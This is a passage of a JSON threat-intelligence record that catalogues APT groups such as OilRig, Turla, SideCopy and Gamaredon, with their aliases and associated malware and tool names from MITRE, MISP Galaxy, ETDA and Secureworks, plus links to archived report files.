			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "12b5d602-4017-4a6f-a2a3-387a6e07a27b",
			"created_at": "2023-01-06T13:46:39.095233Z",
			"updated_at": "2026-04-10T02:00:03.21157Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [],
			"source_name": "MISPGALAXY:InvisiMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434572,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.pdf",
		"text": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.txt",
		"img": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.jpg"
	}
}